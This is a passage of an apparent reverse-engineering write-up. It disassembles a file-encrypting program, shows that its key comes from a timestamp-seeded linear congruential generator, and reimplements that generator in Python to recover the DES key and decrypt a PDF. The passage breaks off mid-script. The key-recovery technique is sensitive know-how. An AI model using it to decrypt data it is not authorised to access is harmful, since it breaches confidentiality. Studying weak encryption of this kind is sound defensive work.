&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d90&lt;/span&gt;      &lt;span class="mi"&gt;55&lt;/span&gt;             &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d91&lt;/span&gt;      &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="nv"&gt;bec&lt;/span&gt;           &lt;span class="nv"&gt;mov&lt;/span&gt; &lt;span class="nb"&gt;ebp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;esp&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d93&lt;/span&gt;      &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="nv"&gt;b4508&lt;/span&gt;         &lt;span class="nv"&gt;mov&lt;/span&gt; &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;arg_8h&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;     &lt;span class="c1"&gt;; [0x8:4]=-1 ; 8&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d96&lt;/span&gt;      &lt;span class="mi"&gt;50&lt;/span&gt;             &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d97&lt;/span&gt;      &lt;span class="mi"&gt;68&lt;/span&gt;&lt;span class="nv"&gt;e8424000&lt;/span&gt;     &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="nv"&gt;str.Seed____d&lt;/span&gt;          &lt;span class="c1"&gt;; 0x4042e8 ; &amp;quot;Seed = %d\n\n&amp;quot;&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401d9c&lt;/span&gt;      &lt;span class="nv"&gt;ff15cc404000&lt;/span&gt;   &lt;span class="nv"&gt;call&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;sym.imp.MSVCR90.dll___iob_func&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="c1"&gt;; pdb.__imp____iob_func ; 0x4040cc&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401da2&lt;/span&gt;      &lt;span class="mi"&gt;83&lt;/span&gt;&lt;span class="nv"&gt;c040&lt;/span&gt;         &lt;span class="nv"&gt;add&lt;/span&gt; &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x40&lt;/span&gt;               &lt;span class="c1"&gt;; &amp;#39;@&amp;#39;&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401da5&lt;/span&gt;      &lt;span class="mi"&gt;50&lt;/span&gt;             &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401da6&lt;/span&gt;      &lt;span class="nv"&gt;ff15c8404000&lt;/span&gt;   &lt;span class="nv"&gt;call&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;sym.imp.MSVCR90.dll_fprintf&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="c1"&gt;; pdb.__imp__fprintf ; 0x4040c8&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401dac&lt;/span&gt;      &lt;span class="mi"&gt;83&lt;/span&gt;&lt;span class="nv"&gt;c40c&lt;/span&gt;         &lt;span class="nv"&gt;add&lt;/span&gt; &lt;span class="nb"&gt;esp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0xc&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401daf&lt;/span&gt;      &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="nv"&gt;b4d08&lt;/span&gt;         &lt;span class="nv"&gt;mov&lt;/span&gt; &lt;span class="nb"&gt;ecx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;arg_8h&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;     &lt;span class="c1"&gt;; [0x8:4]=-1 ; 8&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401db2&lt;/span&gt;      &lt;span class="mi"&gt;890&lt;/span&gt;&lt;span class="nv"&gt;d2c604000&lt;/span&gt;   &lt;span class="nv"&gt;mov&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;0x40602c&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nb"&gt;ecx&lt;/span&gt;   &lt;span class="c1"&gt;; [0x40602c:4]=0&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401db8&lt;/span&gt;      &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="nv"&gt;d&lt;/span&gt;             &lt;span class="nv"&gt;pop&lt;/span&gt; &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00401db9&lt;/span&gt;      &lt;span class="nv"&gt;c3&lt;/span&gt;             &lt;span class="nv"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It seems to only print the seed message that we saw during the execution. Now,
let's see the function &lt;code&gt;super_secure_random&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DC0:&lt;/span&gt; &lt;span class="err"&gt;55&lt;/span&gt;                   &lt;span class="nf"&gt;push&lt;/span&gt;        &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DC1:&lt;/span&gt; &lt;span class="err"&gt;8&lt;/span&gt;&lt;span class="nf"&gt;B&lt;/span&gt; &lt;span class="nv"&gt;EC&lt;/span&gt;                &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;ebp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;esp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DC3:&lt;/span&gt; &lt;span class="nf"&gt;A1&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="nv"&gt;C&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt; &lt;span class="mi"&gt;63&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;state&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;063602Ch&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DC8:&lt;/span&gt; &lt;span class="err"&gt;69&lt;/span&gt; &lt;span class="nf"&gt;C0&lt;/span&gt; &lt;span class="nv"&gt;FD&lt;/span&gt; &lt;span class="mi"&gt;43&lt;/span&gt; &lt;span class="mi"&gt;03&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;    &lt;span class="nv"&gt;imul&lt;/span&gt;        &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;343FDh&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DCE:&lt;/span&gt; &lt;span class="err"&gt;05&lt;/span&gt; &lt;span class="nf"&gt;C3&lt;/span&gt; &lt;span class="mi"&gt;9&lt;/span&gt;&lt;span class="nv"&gt;E&lt;/span&gt; &lt;span class="mi"&gt;26&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;add&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;269EC3h&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DD3:&lt;/span&gt; &lt;span class="nf"&gt;A3&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="nv"&gt;C&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt; &lt;span class="mi"&gt;63&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;state&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;063602Ch&lt;/span&gt;&lt;span class="p"&gt;)],&lt;/span&gt;&lt;span class="nb"&gt;eax&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DD8:&lt;/span&gt; &lt;span class="nf"&gt;A1&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="nv"&gt;C&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt; &lt;span class="mi"&gt;63&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;mov&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="nv"&gt;ptr&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;state&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;063602Ch&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DDD:&lt;/span&gt; &lt;span class="nf"&gt;C1&lt;/span&gt; &lt;span class="nv"&gt;F8&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;             &lt;span class="nv"&gt;sar&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;10h&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DE0:&lt;/span&gt; &lt;span class="err"&gt;25&lt;/span&gt; &lt;span class="nf"&gt;FF&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="nv"&gt;F&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="mi"&gt;00&lt;/span&gt;       &lt;span class="nv"&gt;and&lt;/span&gt;         &lt;span class="nb"&gt;eax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mh"&gt;7FFFh&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DE5:&lt;/span&gt; &lt;span class="err"&gt;5&lt;/span&gt;&lt;span class="nf"&gt;D&lt;/span&gt;                   &lt;span class="nv"&gt;pop&lt;/span&gt;         &lt;span class="nb"&gt;ebp&lt;/span&gt;
&lt;span class="err"&gt;00631&lt;/span&gt;&lt;span class="nl"&gt;DE6:&lt;/span&gt; &lt;span class="nf"&gt;C3&lt;/span&gt;                   &lt;span class="nv"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There seems to be a pointer to a variable &lt;code&gt;state&lt;/code&gt;. Here are the
operations:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;The content of this &lt;code&gt;state&lt;/code&gt; variable is copied to &lt;code&gt;eax&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;eax&lt;/code&gt; is multiplied by 0x343FD, and the result is stored in
&lt;code&gt;eax&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;0x269EC3 is added to &lt;code&gt;eax&lt;/code&gt;, and the result is stored in &lt;code&gt;eax&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;This value is stored in the &lt;code&gt;state&lt;/code&gt; variable.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;eax&lt;/code&gt; is shifted by 0x10 bits to the right.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;eax&lt;/code&gt; is bit-&lt;code&gt;AND&lt;/code&gt;-ed with 0x7FFF.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This function is first called with the Unix timestamp as a seed, and is then
called seven more times to generate the full key. It took a bit of dynamic
analysis with Visual Studio's debugger to understand what was being done.&lt;/p&gt;
&lt;p&gt;Here's an implementation of the key generation in python:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;super_secure_random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFF&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;super_secure_random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;seed&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;

    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;seed&lt;/span&gt;
    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mh"&gt;0x343FD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;
    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mh"&gt;0x269EC3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;

    &lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0x7FFF&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;next_seed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_byte&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;&amp;amp; 0xFFFFFFFF&lt;/code&gt; operations are to make sure that every computation is
done on 32-bit values. Let's see if our function works. Let's use the seed in
our first encryption, &lt;code&gt;1578230480&lt;/code&gt;, and see if we generate the same key:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1578230480&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;generate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="go"&gt;a0ad8f3edde93d45&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray, we get the same key! Now let's try to decrypt our PDF file. But wait,
what is the encryption algorithm? Well, the encryption key is 8-byte long,
which is 56 bits (not super long). The most symetric algorithm using this key
size is &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Data_Encryption_Standard"&gt;DES&lt;/a&gt;. We
can check that by taking a look at the function &lt;code&gt;do_encrypt&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="err"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x0040270a&lt;/span&gt;      &lt;span class="mi"&gt;68000000&lt;/span&gt;&lt;span class="nv"&gt;f0&lt;/span&gt;     &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="mh"&gt;0xf0000000&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x0040270f&lt;/span&gt;      &lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="nv"&gt;a01&lt;/span&gt;           &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;                      &lt;span class="c1"&gt;; 1&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00402711&lt;/span&gt;      &lt;span class="mi"&gt;6870474000&lt;/span&gt;     &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="mh"&gt;0x404770&lt;/span&gt;               &lt;span class="c1"&gt;; &amp;quot;Microsoft Enhanced Cryptographic Provider v1.0&amp;quot;&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00402716&lt;/span&gt;      &lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="nv"&gt;a00&lt;/span&gt;           &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x00402718&lt;/span&gt;      &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="nv"&gt;d4df4&lt;/span&gt;         &lt;span class="nv"&gt;lea&lt;/span&gt; &lt;span class="nb"&gt;ecx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;ebp&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mh"&gt;0xc&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x0040271b&lt;/span&gt;      &lt;span class="mi"&gt;51&lt;/span&gt;             &lt;span class="nv"&gt;push&lt;/span&gt; &lt;span class="nb"&gt;ecx&lt;/span&gt;
&lt;span class="err"&gt;0&lt;/span&gt;&lt;span class="nf"&gt;x0040271c&lt;/span&gt;      &lt;span class="nv"&gt;ff1504404000&lt;/span&gt;   &lt;span class="nv"&gt;call&lt;/span&gt; &lt;span class="kt"&gt;dword&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;sym.imp.ADVAPI32.dll_CryptAcquireContextA&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="c1"&gt;; pdb.__imp__CryptAcquireContextA_20 ; 0x404004&lt;/span&gt;
&lt;span class="err"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The function &lt;a class="reference external" href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta"&gt;CryptAcquireContextA&lt;/a&gt;
is called to obtain an encryption object. The cryptographic service provider
seems to be &lt;a class="reference external" href="https://docs.microsoft.com/en-us/windows/win32/seccrypto/microsoft-enhanced-cryptographic-provider"&gt;Microsoft Enhanced Cryptographic Provider v1.0&lt;/a&gt;,
which does seem to use DES as an encryption algorithm.&lt;/p&gt;
&lt;p&gt;Now, DES is a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation"&gt;block cipher&lt;/a&gt;,
and several mode can be used. I first tried ECB on some test files, but it
didn't seem to work: only the first block seemed correctly decrypted. This
seems to indicate that the used mode is CBC, with an initialization vector
full of null bytes.&lt;/p&gt;
&lt;p&gt;Now that we have everything, let's try to decrypt our PDF file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;datetime&lt;/span&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;Crypto.Cipher&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DES&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;super_secure_random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFF&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;super_secure_random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seed&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;seed&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;

    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;seed&lt;/span&gt;
    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mh"&gt;0x343FD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;
    &lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mh"&gt;0x269EC3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;

    &lt;span class="n"&gt;key_byte&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next_seed&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0x7FFF&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;next_seed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_byte&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;decrypt_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
